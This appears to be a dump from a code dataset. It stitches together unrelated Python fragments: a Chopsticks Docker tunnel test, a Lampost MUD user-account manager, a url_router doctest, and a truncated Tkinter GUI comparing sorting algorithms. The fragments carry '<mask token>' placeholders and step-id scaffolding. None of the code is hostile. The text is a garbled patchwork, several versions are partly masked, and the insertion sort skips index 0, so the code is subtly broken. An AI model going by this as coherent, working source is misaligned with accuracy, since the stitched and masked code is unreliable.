"step-3": "<mask token>\n\n\ndef ping_docker():\n \"\"\"Start a docker container and read out its Python version.\"\"\"\n with Docker('unittest-36', image='python:3.6') as tun:\n return tun.call(python_version)[:2]\n\n\ndef recursive():\n \"\"\"Infinite recursion, requiring depth limit to stop.\"\"\"\n with Local() as tun:\n tun.call(recursive)\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-4": "<mask token>\nfrom unittest import TestCase\nfrom chopsticks.helpers import output_lines\nfrom chopsticks.tunnel import Local, Docker, RemoteException\nfrom chopsticks.facts import python_version\n\n\ndef ping_docker():\n \"\"\"Start a docker container and read out its Python version.\"\"\"\n with Docker('unittest-36', image='python:3.6') as tun:\n return tun.call(python_version)[:2]\n\n\ndef recursive():\n \"\"\"Infinite recursion, requiring depth limit to stop.\"\"\"\n with Local() as tun:\n tun.call(recursive)\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, 'Image %r remained running after test' % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(res, [3, 6])\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(RemoteException, \n '.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n",
"step-5": "\"\"\"Test that Chopsticks remote processes can launch tunnels.\"\"\"\nfrom unittest import TestCase\nfrom chopsticks.helpers import output_lines\nfrom chopsticks.tunnel import Local, Docker, RemoteException\nfrom chopsticks.facts import python_version\n\n\ndef ping_docker():\n \"\"\"Start a docker container and read out its Python version.\"\"\"\n with Docker('unittest-36', image='python:3.6') as tun:\n return tun.call(python_version)[:2]\n\n\ndef recursive():\n \"\"\"Infinite recursion, requiring depth limit to stop.\"\"\"\n with Local() as tun:\n tun.call(recursive)\n\n\nclass RecursiveTest(TestCase):\n docker_name = 'unittest-36'\n\n def tearDown(self):\n ls = output_lines(['docker', 'ps', '-a'])\n images = []\n for l in ls[1:]:\n ws = l.split()\n images.append(ws[-1])\n assert self.docker_name not in images, \\\n \"Image %r remained running after test\" % self.docker_name\n\n def test_python_version(self):\n \"\"\"We can start a sub-tunnel from within a tunnel.\"\"\"\n with Local() as tun:\n res = tun.call(ping_docker)\n self.assertEqual(\n res,\n [3, 6]\n )\n\n def test_depth_limit(self):\n \"\"\"Recursive tunneling is limited by a depth limit.\"\"\"\n with self.assertRaisesRegexp(\n RemoteException,\n r'.*DepthLimitExceeded: Depth limit of 2 ' +\n 'exceeded at localhost -> localhost -> localhost'):\n recursive()\n\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
from base64 import b64decode
import time
from lampost.context.resource import m_requires
from lampost.datastore.dbo import KeyDBO
from lampost.datastore.dbofield import DBOField
from lampost.datastore.exceptions import DataError
from lampost.model.player import Player
from lampost.util.encrypt import make_hash, check_password
from lampost.util.lputil import ClientError
m_requires(__name__, 'log', 'perm', 'datastore', 'dispatcher')
class User(KeyDBO):
dbo_key_type = "user"
dbo_set_key = "users"
dbo_indexes = "user_name", "email"
user_name = DBOField('')
password = DBOField()
password_reset = DBOField(False)
email = DBOField('')
notes = DBOField('')
player_ids = DBOField([])
displays = DBOField({})
notifies = DBOField([])
@property
def edit_dto(self):
dto = super().edit_dto
dto['password'] = ''
return dto
@property
def imm_level(self):
if self.player_ids:
return max([perm.immortals.get(player_id, 0) for player_id in self.player_ids])
return 0
class UserManager():
def _post_init(self):
register("user_connect", self._user_connect)
register("player_connect", self._player_connect)
def validate_user(self, user_name, password):
user = self.find_user(user_name)
if not user:
raise ClientError()
self.validate_password(user, password)
return user
def validate_password(self, user, password):
if check_password(user.password, password):
return
salt, old_password = user.password.split('$')
if check_password(b64decode(bytes(old_password, 'utf-8')), password, bytes(salt, 'utf-8')):
warn("Using old password for account {}", user.user_name)
user.password_reset = True
save_object(user)
else:
raise ClientError("invalid_password")
def find_user(self, user_name):
user_name = user_name.lower()
user_id = get_index("ix:user:user_name", user_name)
if user_id:
return load_object(user_id, User)
player = load_object(user_name, Player)
if player:
return load_object(player.user_id, User)
return None
def delete_user(self, user):
for player_id in user.player_ids:
self._player_delete(player_id)
delete_object(user)
dispatch('publish_edit', 'delete', user)
def delete_player(self, user, player_id):
if user:
self._player_delete(player_id)
user.player_ids.remove(player_id)
save_object(user)
def attach_player(self, user, player):
user.player_ids.append(player.dbo_id)
set_index('ix:player:user', player.dbo_id, user.dbo_id)
dispatch('player_create', player, user)
player.user_id = user.dbo_id
save_object(player)
save_object(user)
return player
def find_player(self, player_id):
return load_object(player_id, Player)
def create_user(self, user_name, password, email=""):
user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,
'email': email, 'password': make_hash(password),
'notifies': ['friendSound', 'friendDesktop']}
user = create_object(User, user_raw)
dispatch('publish_edit', 'create', user)
return user
def check_name(self, account_name, user):
account_name = account_name.lower()
if user:
if account_name == user.user_name.lower():
return
for player_id in user.player_ids:
if account_name == player_id.lower():
return
if self.player_exists(account_name) or get_index("ix:user:user_name", account_name):
raise DataError("InUse: {}".format(account_name))
def player_exists(self, player_id):
return object_exists(Player.dbo_key_type, player_id)
def _user_connect(self, user, client_data):
client_data.update({'user_id': user.dbo_id, 'player_ids': user.player_ids, 'displays': user.displays,
'password_reset': user.password_reset, 'notifies': user.notifies})
def _player_connect(self, player, client_data):
client_data['name'] = player.name
if player.imm_level:
client_data['imm_level'] = player.imm_level
def login_player(self, player):
dispatch('player_baptise', player)
player.last_login = int(time.time())
if not player.created:
player.created = player.last_login
player.start()
def logout_player(self, player):
player.age += player.last_logout - player.last_login
player.detach()
save_object(player)
evict_object(player)
def id_to_name(self, player_id):
try:
return player_id.capitalize()
except AttributeError:
pass
def name_to_id(self, player_name):
return player_name.lower()
def player_cleanup(self, player_id):
delete_index('ix:player:user', player_id)
for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):
dbo = load_object(dbo_id)
if dbo and dbo.owner_id == player_id:
dbo.change_owner()
save_object(dbo)
dispatch('publish_update', 'update', dbo)
dispatch('player_deleted', player_id)
def _player_delete(self, player_id):
player = load_object(player_id, Player)
if player:
dispatch('publish_edit', 'delete', player)
delete_object(player)
else:
warn("Attempting to delete player {} who does not exist.".format(player_id))
self.player_cleanup(player_id)
|
normal
|
{
"blob_id": "210199ed217db0d7a05e280f20e33496c0795f06",
"index": 9472,
"step-1": "<mask token>\n\n\nclass UserManager:\n <mask token>\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n <mask token>\n <mask token>\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n <mask token>\n <mask token>\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n <mask token>\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n <mask token>\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n <mask token>\n <mask token>\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-2": "<mask token>\n\n\nclass UserManager:\n <mask token>\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n <mask token>\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index('ix:user:user_name', user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index('ix:user:user_name',\n account_name):\n raise DataError('InUse: {}'.format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n <mask token>\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-3": "<mask token>\n\n\nclass UserManager:\n\n def _post_init(self):\n register('user_connect', self._user_connect)\n register('player_connect', self._player_connect)\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n\n def validate_password(self, user, password):\n if check_password(user.password, password):\n return\n salt, old_password = user.password.split('$')\n if check_password(b64decode(bytes(old_password, 'utf-8')), password,\n bytes(salt, 'utf-8')):\n warn('Using old password for account {}', user.user_name)\n user.password_reset = True\n save_object(user)\n else:\n raise ClientError('invalid_password')\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index('ix:user:user_name', user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index('ix:user:user_name',\n account_name):\n raise DataError('InUse: {}'.format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n <mask token>\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-4": "<mask token>\n\n\nclass User(KeyDBO):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserManager:\n\n def _post_init(self):\n register('user_connect', self._user_connect)\n register('player_connect', self._player_connect)\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n\n def validate_password(self, user, password):\n if check_password(user.password, password):\n return\n salt, old_password = user.password.split('$')\n if check_password(b64decode(bytes(old_password, 'utf-8')), password,\n bytes(salt, 'utf-8')):\n warn('Using old password for account {}', user.user_name)\n user.password_reset = True\n save_object(user)\n else:\n raise ClientError('invalid_password')\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index('ix:user:user_name', user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index('ix:user:user_name',\n account_name):\n raise DataError('InUse: {}'.format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n\n def _player_connect(self, player, client_data):\n client_data['name'] = player.name\n if player.imm_level:\n client_data['imm_level'] = player.imm_level\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-5": "from base64 import b64decode\nimport time\n\nfrom lampost.context.resource import m_requires\nfrom lampost.datastore.dbo import KeyDBO\nfrom lampost.datastore.dbofield import DBOField\nfrom lampost.datastore.exceptions import DataError\nfrom lampost.model.player import Player\nfrom lampost.util.encrypt import make_hash, check_password\nfrom lampost.util.lputil import ClientError\n\n\nm_requires(__name__, 'log', 'perm', 'datastore', 'dispatcher')\n\n\nclass User(KeyDBO):\n dbo_key_type = \"user\"\n dbo_set_key = \"users\"\n dbo_indexes = \"user_name\", \"email\"\n\n user_name = DBOField('')\n password = DBOField()\n password_reset = DBOField(False)\n email = DBOField('')\n notes = DBOField('')\n\n player_ids = DBOField([])\n displays = DBOField({})\n notifies = DBOField([])\n\n @property\n def edit_dto(self):\n dto = super().edit_dto\n dto['password'] = ''\n return dto\n\n @property\n def imm_level(self):\n if self.player_ids:\n return max([perm.immortals.get(player_id, 0) for player_id in self.player_ids])\n return 0\n\n\nclass UserManager():\n def _post_init(self):\n register(\"user_connect\", self._user_connect)\n register(\"player_connect\", self._player_connect)\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n\n def validate_password(self, user, password):\n if check_password(user.password, password):\n return\n salt, old_password = user.password.split('$')\n if check_password(b64decode(bytes(old_password, 'utf-8')), password, bytes(salt, 'utf-8')):\n warn(\"Using old password for account {}\", user.user_name)\n user.password_reset = True\n save_object(user)\n else:\n raise ClientError(\"invalid_password\")\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index(\"ix:user:user_name\", user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=\"\"):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password),\n 'notifies': ['friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index(\"ix:user:user_name\", account_name):\n raise DataError(\"InUse: {}\".format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.player_ids, 'displays': user.displays,\n 'password_reset': user.password_reset, 'notifies': user.notifies})\n\n def _player_connect(self, player, client_data):\n client_data['name'] = player.name\n if player.imm_level:\n client_data['imm_level'] = player.imm_level\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn(\"Attempting to delete player {} who does not exist.\".format(player_id))\n self.player_cleanup(player_id)\n\n",
"step-ids": [
11,
17,
19,
21,
27
]
}
|
[
11,
17,
19,
21,
27
] |
r""" 测试dispatch
>>> from url_router.map import Map
>>> from url_router.rule import Rule
>>> m = Map([
... Rule('/', endpoint='index'),
... Rule('/foo', endpoint='foo'),
... Rule('/bar/', endpoint='bar'),
... Rule('/any/<name>', endpoint='any'),
... Rule('/string/<string:name>', endpoint='string'),
... Rule('/integer/<int:name>', endpoint='integer'),
... Rule('/float/<float:name>', endpoint='float')
... ])
>>> adapter = m.bind('example.org', '/')
>>> def view_func(endpoint, args):
... print(f'endpoint:{endpoint}\nargs:{args}')
... return str(endpoint)
...
>>> adapter.dispatch(view_func, '/')
endpoint:index
args:{}
'index'
>>> adapter.dispatch(view_func, '/any/value')
endpoint:any
args:{'name': 'value'}
'any'
>>> adapter.dispatch(view_func, '/missing')
Traceback (most recent call last):
...
url_router.exceptions.NotFound
"""
if __name__ == "__main__":
import doctest
doctest.testmod()
|
normal
|
{
"blob_id": "3cca7408eb88f91f295c581c29d3d1e95298f337",
"index": 6445,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n",
"step-3": "r\"\"\" 测试dispatch\n\n>>> from url_router.map import Map\n>>> from url_router.rule import Rule\n>>> m = Map([\n... Rule('/', endpoint='index'),\n... Rule('/foo', endpoint='foo'),\n... Rule('/bar/', endpoint='bar'),\n... Rule('/any/<name>', endpoint='any'),\n... Rule('/string/<string:name>', endpoint='string'),\n... Rule('/integer/<int:name>', endpoint='integer'),\n... Rule('/float/<float:name>', endpoint='float')\n... ])\n>>> adapter = m.bind('example.org', '/')\n\n>>> def view_func(endpoint, args):\n... print(f'endpoint:{endpoint}\\nargs:{args}')\n... return str(endpoint)\n...\n\n\n>>> adapter.dispatch(view_func, '/')\nendpoint:index\nargs:{}\n'index'\n\n>>> adapter.dispatch(view_func, '/any/value')\nendpoint:any\nargs:{'name': 'value'}\n'any'\n\n>>> adapter.dispatch(view_func, '/missing')\nTraceback (most recent call last):\n ...\nurl_router.exceptions.NotFound\n\"\"\"\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from tkinter import *
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import random
import numpy as np
import timeit
def main():
root = tk.Tk()
# root.geometry('800x500')
root.resizable(width=False, height=False)
root.title('Tugas Algoritma')
canvas = tk.Canvas(root, height=500, width=800)
canvas.pack()
bg = tk.PhotoImage(file='bg.png')
bl = tk.Label(root, image=bg)
bl.place(relwidth=1, relheight=1)
# root.iconbitmap('icons/pypad.ico')
########################################################################
def about():
messagebox.showinfo("About", "Simulasi Algoritma Sorting")
def help_box(event=None):
messagebox.showinfo(
"Help", "For help email to hai@irfnrdh.com", icon='question')
def exit_editor():
if messagebox.askokcancel("Quti", "Do you really want to quit?"):
root.destroy()
root.protocol('WM_DELETE_WINDOW', exit_editor)
def donothing():
print("Nothing to do :v")
########################################################################
# Bubble Sort
def bbsort(angka):
for i in range(len(angka)-1, 0, -1):
# swap = False
for j in range(i):
if angka[j] > angka[j+1]:
tampung = angka[j]
angka[j] = angka[j+1]
angka[j+1] = tampung
# swap = True
# if not swap:
# break
# Selection Sort
def sssort(angka):
for i in range(len(angka)):
min_idx = i
for j in range(i, len(angka)):
if angka[j] < angka[min_idx]:
min_idx = j
tampung = angka[i]
angka[i] = angka[min_idx]
angka[min_idx] = tampung
# Insertion Sort
def issort(angka):
for i in range(1, len(angka)):
idx = angka[i]
for j in range(i-1, 0, -1):
if angka[j] > idx:
angka[j+1] = angka[j]
else:
angka[j+1] = idx
break
# Bubble+Insertion+Selection Sort Optimize
def bisort(angka):
for i in range(len(angka)):
min_idx = i
for j in range(i, len(angka)):
if angka[j] < angka[min_idx]:
min_idx = j
tampung = angka[i]
angka[i] = angka[min_idx]
angka[min_idx] = tampung
########################################################################
def bbs_respon():
if len(listbox_widget.get(0, tk.END)) == 0:
print("Data Lu mane?")
else:
print("#################################################### BUBLE SORT ")
hasil_listbox_widget.delete(0, tk.END)
angka = list(listbox_widget.get(0, tk.END))
print("Data Sample \n", angka)
start = timeit.default_timer()
bbsort(angka)
stop = timeit.default_timer()
runtime = stop - start
print("\n Hasil Sorting \n", angka)
print('RunTime : ', runtime)
print('Jumlah data : ', len(angka))
for hasil_entry in angka:
hasil_listbox_widget.insert(tk.END, hasil_entry)
bbs_time.config(text="% .12f" % runtime)
bbs_time.place(x=420, y=185)
def iss_respon():
if len(listbox_widget.get(0, tk.END)) == 0:
print("Data Lu mane?")
else:
print("#################################################### INSERTION SORT ")
hasil_listbox_widget.delete(0, tk.END)
angka = list(listbox_widget.get(0, tk.END))
print("Data Sample \n", angka)
start = timeit.default_timer()
issort(angka)
stop = timeit.default_timer()
runtime = stop - start
print("\n Hasil Sorting \n", angka)
print('RunTime : ', runtime)
print('Jumlah data : ', len(angka))
for hasil_entry in angka:
hasil_listbox_widget.insert(tk.END, hasil_entry)
iss_time.config(text="% .12f" % runtime)
iss_time.place(x=545, y=185)
def sss_respon():
if len(listbox_widget.get(0, tk.END)) == 0:
print("Data Lu mane?")
else:
print("#################################################### SELECTION SORT ")
hasil_listbox_widget.delete(0, tk.END)
angka = list(listbox_widget.get(0, tk.END))
print("Data Sample \n", angka)
start = timeit.default_timer()
sssort(angka)
stop = timeit.default_timer()
runtime = stop - start
print("\n Hasil Sorting \n", angka)
print('RunTime : ', runtime)
print('Jumlah data : ', len(angka))
for hasil_entry in angka:
hasil_listbox_widget.insert(tk.END, hasil_entry)
sss_time.config(text="% .12f" % runtime)
sss_time.place(x=670, y=185)
def bsi_respon():
if len(listbox_widget.get(0, tk.END)) == 0:
print("Data Lu mane?")
else:
print("#################################################### BSI")
hasil_listbox_widget.delete(0, tk.END)
angka = list(listbox_widget.get(0, tk.END))
print("Data Sample \n", angka)
start = timeit.default_timer()
bisort(angka)
stop = timeit.default_timer()
runtime = stop - start
print("\n Hasil Sorting \n", angka)
print('RunTime : ', runtime)
print('Jumlah data : ', len(angka))
for hasil_entry in angka:
hasil_listbox_widget.insert(tk.END, hasil_entry)
bsi_time.config(text="% .12f" % runtime)
bsi_time.place(x=570, y=333)
def generate(entry):
listbox_widget.delete(0, tk.END)
l = int(entry)
listrandom = []
for i in range(l):
value = random.randint(1, 1000)
listrandom.append(value)
listbox_widget.insert(tk.END, value)
angka = listrandom
# print(listrandom)
# listbox_entries = random.sample(range(100), int(entry))
# for entry in listbox_entries:
# listbox_widget.insert(tk.END, entry)
#angka = listbox_widget.get(0, tk.END)
def cls():
hasil_listbox_widget.delete(0, tk.END)
print("\n" * 100)
# print [ listbox_widget.get(i) for i in listbox_widget.curselection()]
########################################################################
menubar = Menu(root)
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label="Generate Random Number", command=donothing)
filemenu.add_command(label="Close", command=exit_editor)
filemenu.add_separator()
filemenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="File", menu=filemenu)
